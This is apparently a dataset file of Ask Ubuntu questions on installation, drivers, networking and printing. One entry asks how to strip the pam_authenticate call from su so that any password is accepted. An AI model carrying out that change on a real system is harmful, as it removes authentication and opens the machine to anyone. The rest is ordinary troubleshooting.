425890	problem with tomcat installation in ubuntu server	i 'm new to ubuntu and open-stack . i just started playing with it . i 've created an instance with ubuntu server and trying to install tomcat server . i 've done tomcat6 installation using apt-get , after that i 've configured java_home in /etc/default/tomcat6 file too . but the problem is if i 'm trying to access it using web console its showing the connection has timed out i 've madeconnectiontimeout= '' 200000 '' . still its not working , please let me know what are the common mistakes we are going to commit in the process of installation .
425891	trouble installing broadcom 43142 drive in linux 12.10	i 've checked/tried pretty much every link in the ubuntu forums , and i still ca n't get anything to work . one of the most common suggestions is to download a driver from jas.gemnetworks.com , but this seems to be 404ing - i 'm not sure of the best alternative to this suggestion . i do n't know what would be most useful for me to post , but i 'll gladly add any info you guys require . thanks !
425892	does anyone know how to make unity remember your opened windows on logout ?	does anyone know how to make unity remember your opened windows on logout ? i know kde does this , but would like unity to remember what applications were loaded and to restart them in the appropriate workspaces and window positions .
425893	confused about installing python 3.3.4 on ubuntu 12.04lts	i know it 's a basic question , but a lot of the information out there is outdated on stack overflow . when i used the suggest apt-get command , i could only installed python3.2.3 . and when i finally installed python 3.3.4 manually , i am missing the zlib module . this entirely is really frustrating me , precisely because it 's seem so basic . i would really appreciated if someone could point me out an up to date guide or tell me how to install the lastest python 3.3.4 in the correct directory with all the right module . thank you
425894	why automatic installed mysql 5.5 when i install mysql workbench 6.0.9 from deb file using ubuntu software center	i am using ubuntu 13.10 and already installed mysql 5.6.16 on it . i have downloaded mysql workbench deb file ( mysql-workbench-community-6.0.9-1ubu1310-amd64 ) from mysql web site . now when i run this deb file with ubuntu software center it is automatically install mysql 5.5 in system . how can i install mysql workbench only ? ? thanks in advance
425898	ubuntu runs real slow , then crashes installing nvidia driver	here 's the hardware : p4 2.4ghz ( 32bit ) 2 gigs ram asus dvd burner msi geforce 5200 fx 1 seagate 60 gig ( ide ) 1 wd black 80 gig ( ide ) usb mouse ps2 keyboard 17 '' nec lcd software : ubuntu 13.1 default install ( full ) i let ubuntu setup disk and partitions allow install of updates and 3rd party software . install goes fairly well maybe a bit slow but otherwise . get to reboot screen reboot hangs after bios . reset very slow boot to os ! 12 minutes ! ! moving around very slow ! firefox 3.5 minutes to load . video drivers loaded are default not nvidia i find the place to load drivers it finds the card and attempts to install and run . after install os freezes ca n't recover so did reboot . no video at all now . i see there are other flavors like kubuntu and lubuntu would these be a better choice ?
425899	how can i install ubuntu 12.04 on a cisco ucs c220m3 server using it 's embedded raid controller for storage	i can not install ubuntu 12.04 on a cisco ucs c220m3 server which use its embedded raid controller for its storage . where can i download the driver and also what 's the steps for completing the ubuntu installation ? thanks in advance !
425903	unable to install ubuntu 12.04 on asus eee 900ha	please be gentle -- i 'm a linux virgin . : -d i 've wanted to convert to linux for many years now , because i hate microsoft with all the passion of a million white-hot suns . when i learned that microsoft will stop offering support for windows xp in april , which is the os my netbook came with , i decided it 's a sign that the time has come to make the change . so ... i downloaded ubuntu desktop 12.04 . i tried to run the wubi .exe file , but i got an error message : can not install into c : \ubuntu there is another file or directory with this name . please remove it before continuing . for more information , please see the log file : c : \docume~1 ... \wubi-12.04.4-rev280.log i tried to remove every file with ubuntu or wubi as part of its name , but when i tried again to install i still could n't get it to work . how do i get the installation to succeed ? ( my browser is google chrome , if that helps . also , the netbook does n't have a cd drive and i do n't have a usb stick , so what i really want is to install ubuntu from website or my netbook 's hard drive . ) thanks , molly
425904	trouble with getting edimax ew-7811un drivers installed on older dell desktop	i am a complete newbie to ubuntu and was expecting just to have a plug and play wireless usb adapter so i can surf the web but i was wrong . i do not know where to start and i hope someone can help get me going .
425907	nmap in ubuntu 13.10	idk wheather to post such a silly question in this forum.just out of interest i want to know few things . can i use nmap in ubuntu 13.10 is backtrack another distro like ubuntu i have heard that backtrack is based on ubuntu` if backtrack comes with bundle tools like nmap is nmap and other tool like wireshark found in ubuntu software center is powerful as backtrack if backtrack is updated to kali linux ?
425909	how do i control my fan speed ?	i installed ubuntu 13.10 and the fans are quite loud . i followed the instructions on this forum link and configured lm-sensors then attempted to configure fancontrol . i ran lm-sensors as sudo , it found some things and i loaded the modules it recommended into the kernel . however when i ran pwmconfig it said `` there are no pwm-capable sensor modules installed '' . when i run the sensors command i get the following output . i 'm not sure if any of these temps seem high . anyway , not sure what else to try . coretemp-isa-0000 adapter : isa adapter core 0 : +40.0°c ( high = +79.0°c , crit = +99.0°c ) core 1 : +40.0°c ( high = +79.0°c , crit = +99.0°c ) core 2 : +43.0°c ( high = +79.0°c , crit = +99.0°c ) core 3 : +37.0°c ( high = +79.0°c , crit = +99.0°c ) atk0110-acpi-0 adapter : acpi interface vcore voltage : +0.93 v ( min = +0.80 v , max = +1.60 v ) +3.3 voltage : +3.30 v ( min = +2.97 v , max = +3.63 v ) +5 voltage : +5.07 v ( min = +4.50 v , max = +5.50 v ) +12 voltage : +12.14 v ( min = +10.20 v , max = +13.80 v ) cpu fan speed : 1041 rpm ( min = 600 rpm , max = 7200 rpm ) chassis1 fan speed : 1110 rpm ( min = 600 rpm , max = 7200 rpm ) chassis2 fan speed : 1638 rpm ( min = 600 rpm , max = 7200 rpm ) chassis3 fan speed : 0 rpm ( min = 600 rpm , max = 7200 rpm ) power fan speed : 1461 rpm ( min = 0 rpm , max = 7200 rpm ) cpu temperature : +38.5°c ( high = +60.0°c , crit = +75.0°c ) mb temperature : +50.0°c ( high = +45.0°c , crit = +75.0°c ) radeon-pci-0200 adapter : pci adapter temp1 : +64.5°c
425912	how to manage wifi driver in ubuntu	my lenovo x201 has a constant problem of disconnecting after a short period of time . i have reason to believe that this is because it switches to power off to save energy . how do i manage wifi driver in ubuntu . i 'm new to it but in windows i would fix this by , control panel - > system properties - > device manager - > under wireless card select property . -untick windows device swithoff for power saving -power output to maximum -roaming aggressiveness to low .
425916	how to call qt or local function from ubuntu html5 app ?	i have create a html5 app from ubuntu sdk . it contains a index.html and js directory . next i add `` x '' label on the html file like this : < head > ... < style type= '' text/css '' > # quit { background-color : gray ; color : white ; font-weight : bold ; display : block ; text-align : right ; } < /style > < /head > < body > < a id= '' quit '' > x < /a > ... < /body > the wanted effect is when “x” label is clicked , the qt.quit ( ) will be called and the app window be closed . unfortunately , it wo n't . the app is launched by `` ubuntu-html5-app-launcher '' ( contained in package `` ubuntu-html5-theme '' ) . so , how to modify ubuntu-html5-app-launcher to let the html5 app do something as well as native apps , for example , just close the window when we click the item defined in the html file ? fyi : i found if i choose `` applications > > html5 application '' template from `` new file or project '' menu in the sdk , qt.quit ( ) can be called by html file ( thru addtojavascript function ) : void html5applicationviewerprivate : :addtojavascript ( ) { m_webview- > page ( ) - > mainframe ( ) - > addtojavascriptwindowobject ( `` qt '' , this ) ; } however `` applications > > html5 application '' type app can not transfer some events such as mouse over and mouse move to the built-in webview , as a result , when user move mouse on and over the elements of the html , nothing will happen unless you click the elements . so my questions are : how to make html5 apps launched by ubuntu-html5-app-launcher to call qt functions within html file . namely how to modify ubuntu-html5-app-launcher or how to make `` applications > > html5 application '' type apps to transfer specified events , such as mouse move and over , to the built-in html file loaded by c++ class ( in my demo is html5applicationviewer inherit form qwidget )
425919	will kde and gtk compatible software work in xubuntu ( xfce ) ?	in the software center , there is a lot of software with needs kde or this is gtk compatible . can this software work in xubuntu xfce ?
425921	adding custom keyboard layout to xubuntu 13.10	i 'm trying to add workman-p layout to xubuntu . it comes with several otions to install . there are files for xorg , xmodmap , and *.kmap files . from this article i found out that you need to add keymaps to /etc/x11/xkb/symbols/ , and that all the layout files should be there , but i did n't even have the directory . so i added it , copied the files there but it did n't help in any way . i guess xfce does n't use this folder in 13.10 . i had some success with xmodmap but it just changed my layout and turned off the switching to russian i have set up . i need a way to add layout so that it can be switched in a normal way i.e . the settings menu .
425923	accessing shares on computer connected to network over shared internet connection	i have a computer that is connected to the internet via a shared network set up like this . the internet connection on this machine works with no issues and i can access the nfs shares on it from the machine sharing the connection . i can not , however access the shares from any other computer on the main network . as i am unsure of where the issue actually lies i have been unable to search for fixes with any success so even a simple pointer in the right direction would be helpful . thanks .
425930	not able to configure amd driver . libgl.so.1 not found	i have a samsung np-300 laptop with amd raedon hd8750m graphics . the driver supplied by amd used to work fine with ubuntu 13.04 ( 64 bit ) . after upgrading to 13.10 and installing the latest driver , initializing the adapter gives this error : root @ sidds-np300 : /home/sidds/softwares/amd radeon hd 8750m driver # aticonfig -- initial -- adapter=all aticonfig : error while loading shared libraries : libgl.so.1 : can not open shared object file : no such file or directory when i tried locating libgl.so.1 using locate it shows that it is actually installed : sidds @ sidds-np300 : ~ $ locate -e libgl.so.1 /home/sidds/.local/share/steam/ubuntu12_32/steam-runtime/amd64/usr/share/doc/nvidia-cg-toolkit/examples/tools/trace/libgl.so.1.gz /home/sidds/.local/share/steam/ubuntu12_32/steam-runtime/i386/usr/share/doc/nvidia-cg-toolkit/examples/tools/trace/libgl.so.1.gz /usr/lib64/fgl.renamed.libgl.so.1.2 /usr/lib64/libgl.so.1 /usr/lib64/libgl.so.1.2 removing ia32-libs does n't help either , though it is required by the driver . also , lspci -knn does list the card . kindly suggest something to resolve this issue .
425931	how can i use `` inside send command	i have used the /usr/bin/expect interpreter to telnet into my other system and execute some commands using send . telnet is successful however the problem is that i have to use the following command send `` unset vpn `` test '' `` when i run the script , it shows me the following error due to `` inside send command . extra characters after close-quote while executing
425932	cross compile for arm using gcc-multilibs	there are various questions available in askubuntu related to cross compiling . they were not of much help to me . i used to work on gcc-4.5/4.6 for arm . it was available in ubuntu repo under the name gcc-4 . *-arm-linux-gnueabi my host linux is running on ubuntu-12.04 . when i planned to move to the latest gcc cross compilers of version 4.7/4.8 , it was found that these were the only list of packages available in repo : gcc-4 . * gcc-4 . *-base gcc-4 . *-doc gcc-4 . *-locales gcc-4 . *-multilib gcc-4 . *-plugin-dev gcc-4 . *-source i could not find a version specifically for arm compilers . gcc-4 . *-multilib must be the package that handles all the cross compiling stuff . how could i use this package to cross compile for arm on soft-float i could not fetch much information from search engines . even links that would help with my problem are appreciated .
425935	internet connection issue : vodafone dongle k3570-z	i am using ubuntu 12.04 64 bit version . i recently reinstalled ubuntu which have kernel version to 3.8.0-35-generic . i am trying to connect through my vodafone dongle k3570-z but unable to connect to internet . it displays the connection name in the option but when i connect it , it disconnects again and again . i was able to use the same dongle in my previous 12.04 which had kernel version 3.2.xxx-generic . any help will be appreciable .
425938	how to setup canon ir2520 network scanner ?	i have at my workplace canon imagerunner 2520 scan/print machine . i managed to setup printing but scanning i do n't know how . can somebody help me ?
425941	does clean install remove non-standard root directories ?	i need to clean install ubuntu 12.04 and i understand that this will remove everything that was in the /home directory . in addition to standard folders such as /var , /etc , /usr and the such , let 's say i have other directories such as : /backup and /backup2 which are empty unless i mount the corresponding hard drives . so it would n't be too much of a problem if the folders are deleted , i 'll just re-create them and mount the disks . /others which contains some documents ( do n't ask me why it 's there ) ; would non-standard folders like /others disappear upon clean install , or will the system ignore folders that do not seem relevant to ubuntu ?
425942	if i make an html5 app with the ubuntu sdk , will it work on android ?	if i develop an html5 app with the ubuntu sdk , how easy would it be to port that to other mobile platforms , like android ? one of the reasons i would want to use html5 would be potentially the easy of reusing that same code base elsewhere .
425947	canon printer wo n't print pdf files	i am stumped with this situation . i have a new canon pixma mg5300 inkjet printer which is connected via usb . anything else than pdf works perfectly fine : ubuntu printer test page , libreoffice files , web pages , gimp images . but it wo n't print any pdf file , from any pdf-viewer app . when i print a pdf file , the printer wakes up just as usual , and the display shows `` processing '' as usual . but the output tray does not open ( it usually does ) , and after a few seconds the display just goes back to idle . the file disappears from ubuntu 's print queue just as if it had been printed . i 've tried removing the printer and letting the computer rediscover and reinstall it . i 'm using default printer settings . i 've installed a number of pdf viewer apps from the software center , just to rule out that the built-in document viewer is to blame . i 've tried with a wide variety of pdf files -- some generated by simplescan , some downloaded from the internet . the printer also has a wifi interface , so i 've tried installing it as a wifi printer and use that instead of via usb . no difference . what can i do to troubleshoot this ? ubuntu 13.10 detects and correctly identifies the printer , and provides drivers for it . i have not tried to find alternative drivers yet .
425948	wso2 server doesnot work for wso2 user	when i am trying to run server from the instance , its says : `` ./wso2server.sh : 189 : kill : operation not permitted . '' now every time when i have to start or stop the server , i have to move to root and do that.. i have checked the permissions for the server instance folder , they have the permissions for that particular user only . can you tell me what is the issue , so that i can start/stop server from that particular user only ?
425951	system starts up slowly with errors including bluetooth timeout	i have tried several solutions posted in the possible duplicate , but it does not work for me for the bluetooth timeout part , and my system have more problems than that . see details at the end of this question . i know my laptop does not have bluetooth support , but the system always try something like waiting for bluetooth to be ready , which results in following error when system start up : info @ wl_cfg80211_attach : registerted cfg80211 phy bluetooth : hci0 command 0x1003 tx timeout when i select to start ubuntu at the grub menu , the screen is empty for about 15 seconds and them above messages show up one by one , seconds between . i tried to the bluetooth off from the top bar of ubuntu system , but it is turned on again after restarts . i also tried three solutions posted in how can i deactivate bluetooth on system startup ? but none of them fix my problem . add `` rfkill block bluetooth '' to /etc/rc.local file , before `` exit 0 '' . this does not have any effect . add `` echo disable > /proc/acpi/ibm/bluetooth '' to /etc/rc.local file , before `` exit 0 '' . on first restart , the second message disappear , but wait time remains . on second restart , same symptom as before . add `` blacklist btusb '' to the end of `` /etc/modprobe.d/blacklist.conf '' . the second message disappear on starts up , but wait time remains , and there is still an option saying `` turn off bluetooth '' in the top bar everytime i login .
425952	onboard ethernet card does not work	i am using ubuntu 12.04 , my motherboard got damaged , so i have to replace it with a new motherboard . i connected the hard disk to the new motherboard . my external ethernet cards are working , but the ethernet card in the motherboard is not working . if i give sudo /etc/init.d/networking restart it shows : ignoring unknown interface eth0=eth0 intel mother board if i give lspci -v. i get the following output : 00:00.0 host bridge : intel corporation 82g33/g31/p35/p31 express dram controller ( rev 10 ) flags : bus master , fast devsel , latency 0 capabilities : kernel driver in use : agpgart-intel 00:01.0 pci bridge : intel corporation 82g33/g31/p35/p31 express pci express root port ( rev 10 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 capabilities : kernel driver in use : pcieport kernel modules : shpchp 00:02.0 vga compatible controller : intel corporation 82g33/g31 express integrated graphics controller ( rev 10 ) ( prog-if 00 [ vga controller ] ) subsystem : intel corporation 82g33/g31 express integrated graphics controller flags : bus master , fast devsel , latency 0 , irq 44 memory at ff900000 ( 32-bit , non-prefetchable ) [ size=512k ] i/o ports at f140 [ size=8 ] memory at d0000000 ( 32-bit , prefetchable ) [ size=256m ] memory at ff600000 ( 32-bit , non-prefetchable ) [ size=1m ] expansion rom at [ disabled ] capabilities : kernel driver in use : i915 kernel modules : i915 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) subsystem : intel corporation device d608 flags : bus master , fast devsel , latency 0 , irq 45 memory at ff980000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 i/o behind bridge : 00002000-00002fff memory behind bridge : e4200000-e43fffff prefetchable memory behind bridge : 00000000e4400000-00000000e45fffff capabilities : kernel driver in use : pcieport kernel modules : shpchp 00:1c.1 pci bridge : intel corporation n10/ich 7 family pci express port 2 ( rev 01 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 i/o behind bridge : 0000e000-0000efff memory behind bridge : ff800000-ff8fffff prefetchable memory behind bridge : 00000000e4000000-00000000e41fffff capabilities : kernel driver in use : pcieport kernel modules : shpchp 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) ( prog-if 00 [ uhci ] ) subsystem : intel corporation n10/ich 7 family usb uhci controller # 1 flags : bus master , medium devsel , latency 0 , irq 23 i/o ports at f080 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) ( prog-if 00 [ uhci ] ) subsystem : intel corporation n10/ich 7 family usb uhci controller # 2 flags : bus master , medium devsel , latency 0 , irq 19 i/o ports at f060 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) ( prog-if 00 [ uhci ] ) subsystem : intel corporation n10/ich 7 family usb uhci controller # 3 flags : bus master , medium devsel , latency 0 , irq 18 i/o ports at f040 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) ( prog-if 00 [ uhci ] ) subsystem : intel corporation n10/ich 7 family usb uhci controller # 4 flags : bus master , medium devsel , latency 0 , irq 16 i/o ports at f020 [ size=32 ] kernel driver in use : uhci_hcd 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) ( prog-if 20 [ ehci ] ) subsystem : intel corporation n10/ich 7 family usb2 ehci controller flags : bus master , medium devsel , latency 0 , irq 23 memory at ff984000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : kernel driver in use : ehci_hcd 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev e1 ) ( prog-if 01 [ subtractive decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=32 i/o behind bridge : 0000d000-0000dfff memory behind bridge : ff700000-ff7fffff capabilities : 00:1f.0 isa bridge : intel corporation 82801gb/gr ( ich7 family ) lpc interface bridge ( rev 01 ) subsystem : intel corporation desktop board d945gtp flags : bus master , medium devsel , latency 0 capabilities : kernel modules : leds-ss4200 , itco_wdt , intel-rng 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 01 ) ( prog-if 8a [ master secp prip ] ) subsystem : intel corporation 82801g ( ich7 family ) ide controller flags : bus master , medium devsel , latency 0 , irq 16 i/o ports at 01f0 [ size=8 ] i/o ports at 03f4 [ size=1 ] i/o ports at 0170 [ size=8 ] i/o ports at 0374 [ size=1 ] i/o ports at f0f0 [ size=16 ] kernel driver in use : ata_piix 00:1f.2 ide interface : intel corporation n10/ich7 family sata controller [ ide mode ] ( rev 01 ) ( prog-if 8f [ master secp seco prip prio ] ) subsystem : intel corporation n10/ich7 family sata controller [ ide mode ] flags : bus master , 66mhz , medium devsel , latency 0 , irq 17 i/o ports at f0e0 [ size=8 ] i/o ports at f0d0 [ size=4 ] i/o ports at f0c0 [ size=8 ] i/o ports at f0b0 [ size=4 ] i/o ports at f0a0 [ size=16 ] capabilities : kernel driver in use : ata_piix 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 01 ) subsystem : intel corporation device d608 flags : medium devsel , irq 10 i/o ports at f000 [ size=32 ] kernel modules : i2c-i801 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 01 ) subsystem : intel corporation device d608 physical slot : 2 flags : bus master , fast devsel , latency 0 , irq 43 i/o ports at e000 [ size=256 ] memory at ff820000 ( 64-bit , non-prefetchable ) [ size=4k ] expansion rom at ff800000 [ disabled ] [ size=128k ] capabilities : kernel driver in use : r8169 kernel modules : r8168 , r8169 04:05.0 ethernet controller : via technologies , inc. vt6105/vt6106s [ rhine-iii ] ( rev 8b ) subsystem : d-link system inc device 1405 flags : bus master , stepping , medium devsel , latency 32 , irq 20 i/o ports at d100 [ size=256 ] memory at ff700100 ( 32-bit , non-prefetchable ) [ size=256 ] capabilities : kernel driver in use : via-rhine kernel modules : via-rhine 04:06.0 ethernet controller : via technologies , inc. vt6105/vt6106s [ rhine-iii ] ( rev 8b ) subsystem : d-link system inc device 1405 flags : bus master , stepping , medium devsel , latency 32 , irq 21 i/o ports at d000 [ size=256 ] memory at ff700000 ( 32-bit , non-prefetchable ) [ size=256 ] capabilities : kernel driver in use : via-rhine kernel modules : via-rhine
425953	how to remove bookmarks from webbrowser app in ubuntu touch ?	whenever accessing the activities '' and/or bookmarks tab ubuntu touch takes ages ( 10+ seconds ) to respond . i read somewhere that too many bookmarks may slow the performance . not that i have that many bookmarks , but i would like to try and remove the ones i have . i have tried press-and-hold on the bookmarks , but no delete action is triggered . how do i remove them ?
425954	.bachrc $ path does n't find my python scripts	i 've tried adding a path to my .bashrc file as follows export path=/beda/users/home/user252083/bin : $ path and yes , i can then run the binary `` bader '' , which is in the bin folder from anywhere . i also want to run python scripts added to the bin folder , e.g . i want to run python charge.py from any directory but i get the error message python : ca n't open file 'charge.py ' : [ errno 2 ] no such file or directory any idea how to solve this ?
425957	fglrx driver missing after update 12.04	i updated my latop recently and after the update it started overheating and shutting down . this is problem which i have had previously on this laptop and the solution was to use fglrx driver . the opensource driver overheats my laptop which has a good change of damaging my hardware . so knowing this i checked additional drivers and discovered that fglrx was no longer an option . what has happened to fglrx and how do i get it back ? my graphics card is a mobility radeon hd 4530 . as previously stated the opensource driver is not an option because it causes my laptop to overheat and shutdown . to clarify , i want to know why the driver was removed in the update and get back to the official distro version of fglrx not install the latest from ati .
425962	how big is the deja-dup download ?	i have successfully backed up my laptop data using deja-dup . i used a dedicated backup server , which i connected to using ssh over my home lan . the size of the backup on the server disk is 250 gb . afterwards , i am trying to create an incremental backup from the same laptop , this time from my workplace . the destination machine is the very same server , but this time , of course , i had to change the address . i opened a port for ssh and installed noip on the server . after starting the backup , deja-dup is forever in the `` preparing '' stage . iftop tells me that i am downloading data from the backup server at about 300 kib/s . i guess deja-dup needs to keep track of what is on the server already : is this correct ? a related question is : given a backup size of ( for example ) 259 gb , how much data will deja-dup download before starting the backup ?
425963	does ubuntu touch support memory swap ?	so , i have android 4.1 on zte blade g. the problem is that i have only 512 ram , an apps sometimes crashes if i have multiple applications running in the background . i wanted to install cyanogenmod , but it 's not available for my phone . now , i 'm considering installing ubuntu touch . does ubuntu touch support memmory swap to sd card ? and are the overclocking processor available ? thank you !
425964	installing libraries for wine manually	i am trying to install wine manually but after running configure , a series of warnings were printed saying for example configure : warning : libjpeg development files not found , jpeg wo n't be supported so i am guessing i have to install these libraries too . i do not have the option of using apt-get as i do not have root access and i am installing all this locally in my workstation . i would really appreciate it if someone could tell me how to install these libraries .
425965	sigfillset is not setting signal bits	i am having this strange problem ! my code is very simple . # include < stdio.h > # include < unistd.h > # include < signal.h > # include < stdlib.h > main ( ) { sigset_t signal ; printf ( `` value of signal before sigfil is % x\n '' , signal ) ; sigemptyset ( & signal ) ; printf ( `` value of signal after sigempty is % x\n '' , signal ) ; sigfillset ( & signal ) ; printf ( `` value of signal after sigfil is % x\n '' , signal ) ; } but every time i compile and run the code , i am getting some random values . example : value of signal before sigfil is bf77c638 value of signal after sigempty is 1a934000 value of signal after sigfil is 1a934000 i tried this on ubuntu 12.10 and fedora . am i missing something here ?
425966	how can i download skype ?	i am using ubuntu 12.04 lts and i want to know from where can i download skype for a 64 bit ? does anyone gave the link or command line ?
425970	i was trying to change my password , on my user account and accidently pressed enter too fast . im running 12.04lts	im running in 12.04lts on a dell inspiron mini 910 - with default specks . i really just need to get this fixed . when i use the sudo passwd root command , it still says i cant change it , the account is unlocked , but when i go to account settings , it seems that i dont have the current password right , because i cant seem to remember it . i used these in recovery mode : sudo passwd su password : joe password joe enter new unix password : retype new unix password : passwd : password success root @ ubuntu : ~ # im still getting authentication errors , as well as error id 'password ' . i booted up held shift , and ran in root . but it asks for a password , and i dont know it .
425971	invalid signature error while entring in window dualboot with ubuntu	i am new to ubuntu and i have just installed ubuntu 13.10 so it works perfectly . but after i enter on windows 8 it shows this : error : invalid signature what should i do to run my windows os with ubuntu side by side ? ( both are 64 bit architecture )
425976	ubuntu 13.10 some system settings reset after reboot ( touch-pad disable )	i 'm running ubuntu 13.10 on an asus m70sa notebook ( and recognised as such during install ) . every time i boot , i have to go into system settings to turn off my touch-pad . once i make the change , it works for the remainder of the session . what i do n't understand is why my choice is forgotten between boots . how can this be fixed ? cheers , nap
425978	can not download the metalink and therefore the iso	i am installing ubuntu 13.10 desktop version on my windows 7 . i want to remove my old os which is windows 7 and replace from ubuntu . i am trying to installing it by wubi.exe . but it is shows error while installing . the error is can not download the metalink and therefore the iso . for more information , please see the log file please suggest any better way to do that . thanks
425981	how can you add a second main repository to sources.list ?	i had a problem with some software , that does n't provide a ppa but a whole alternative main repository , to install it . adding that repository to my sources.list made aptitude install a newer kernel than in the standard ubuntu repo : deb http : //de.archive.ubuntu.com/ubuntu/ saucy main restricted i got conflicts then that appeared using aptitude install so the solution i found was disable the main ubuntu repository in the sources.list with # do an aptitude update and install - that solved all aptitude install issues . then i re-enabled the main ubuntu repository and disabled the software repository in the sources.list is there a better alternative ?
425982	compiz put to next output does not work in all winsows configurations	ubuntu 12.04 lts 64bit . compiz `` put to next output '' does not work for windows which were placed/sized with grid top or bottom ( left , right or full width ) . the window bounces back to previous location . it works well for windows placed left , right , full or not docked to any corner . could be related to nvidia driver i use for my geforce gtx 550 ti ( version 304.116 ) but i would like to seek others opinion before i start playing with this driver .
425989	installation stops after reboot	i was trying to install `` ubuntu-13.10-desktop-amd64 '' . after installation when it asks to reboot the system . after rebooting i select ubuntu and then the installation continues but after copying files the installation stops at installing systems . i have tried to install ubuntu-11.10-desktop-i386 also .
425996	how can i get my lost data due to of installation of ubuntu 13.10 ?	i have installed ubuntu 13.10 , but after installation my total hard drive data get formatted . no drives are showing at ubuntu os . so how can i get my lost data of 1 tb from my laptop ? before ubuntu i had installed windows 8 64 bit ? help me . suggest me few things what to do ? please .
425998	ubuntukylin desktop 13.04 would n't boot after changing windows 8 bootloader settings	yesterday i installed ubuntukylin 13.04 . everything was fine until today i changed windows 8 metro bootloader settings to ubuntu as default and waiting time 5 seconds . now when i boot into ubuntu , the boot purple screen will appear , but then changed to black , and my monitor is disconnected . but booting into windows 8 is normal . i am pretty sure that it is my windows 8 bootloader settings that made such mistake . i would not like to reinstall ubuntu . what should i do ? thank you update : i am able to boot once by resetting the bcd . but only once , the second time is not successful
426000	ubuntu server 12.04 - oracle db and glassfish server	i have a vm ( virtualbox ) with ubuntu installed in nat config ( the network im working on doesnt let me use anything else ) . in there i have successful installed glashfish server 4.0 and oracle-xe_10.2.0.1-1.0_i386 i used this version because i dont have a x64 machine to make the conversion of the original rpm . i can access the db from the host ( using sqldeveloper or netbeans ) . but when i deploy a web application to glashfish and try to access it i get : [ 2014-02-25t11:11:30.801+0000 ] [ glassfish 4.0 ] [ info ] [ ] [ ] [ tid : _threadid=19 _threadname=thread-3 ] [ timemillis : 1393326690801 ] [ levelvalue : 800 ] [ [ getsingleresult ( ) did not retrieve any entities . ] ] can someone point me on the right direction ?
426001	how do i enable instant on feature on my asus f550c in ubuntu 12.04 ?	my laptop is an asus f550c . it has a feature called instant on to recover the laptop from sleep mode in only 3 seconds , the laptop can be in sleep mode for up to 21 days . it appears that asus does n't provide the driver to install it this software on ubuntu . do anyone have an alternative solution to enable the instant on feature within ubuntu 12.04 ? how may i speed up the recovering from sleep mode ? how may i put the laptop in very low battery consume while it is in sleep mode ?
426004	ubuntu on hisense 7 pro tablet	how can i root and install ubuntu on my hisense zero 7 pro ? i do n't want to run it on a virtual machine . i want to be able to physically install it and boot up from an sd card if possible ?
426008	install ubuntu on merlin hmc turbo	its possible to install ubuntu on merlin hmc turbo http : //merlin-digital.com/home-multimedia-center-turbo.html orginal os link http : //merlin-digital.com/fileuploader/download/download/ ? d=0 & file=custom % 2fupload % 2f1334533118 % 2finstall.img
426009	how open xml file on libreoffice	anyone know how to open xml file ? maybe with libreoffice ? if i use libreoffice i just see only the text format of xml , with all tags and so on .
426011	wireless does not activate when the computer starts up . it works after the first hibernation	i have a asus f550c laptop with ubuntu 12.04 installed . when it starts up , the wireless device is off , and the key combination fn+f2 to turn it on does not work . to activate the wireless device , the work around i have been using is to hibernate the laptop and to recover it from hibernation . after the laptop comes out of hibernation for some magical reason the wireless card works . does anyone have a solution to avoid having to use this hibernation workaround , so that the wireless card works on startup ?
426014	fn keys take 10 minutes to take effect	i have an asus 1215n running xubuntu 13.10 . at 1st i thought the fn keys did n't worked at all , but i started noticing that they work but only after 10 minutes since i pressed the key . for example i press fn+f5 to change brightness and only around 10 minutes after i see the screen changing brightness . anyone knows why these works this way ? i already had this problem in older versions of xubuntu .
426015	how to disable/remove call to pam_authenticate for su	i am using following ubuntu linux ubuntu 3.11.0-12-generic # 19-ubuntu smp wed oct 9 16:12:00 utc 2013 i686 i686 i686 gnu/linux i want to disable call to pam_authenticate in su utility for my experiment so that when one user do su whatever he gives as password it should be succeeded . ps . i am novice in unix environment thanks in advance for your guidance
426017	problem with lock and installation	i am getting to use ubuntu recently . while installing firefox flash plugin , it took too long that i could not install another package i.e . /var/lib/dpkg/lock permission denied i tried to interrupt the installation by remove lock file with rm -f and installed the other package situation turned even worse when i had to run 'sudo dpkg -- configure -a ' again and still it took too long so i decided to quite by ctrl-c now i can not even install any other package . the error is : '' dpkg : error : parsing file '/var/lib/dpkg/updates/0011 ' near line 0 : newline in field name ` # padding ' '' why is it so troublesome with just a simple installation task ? please help
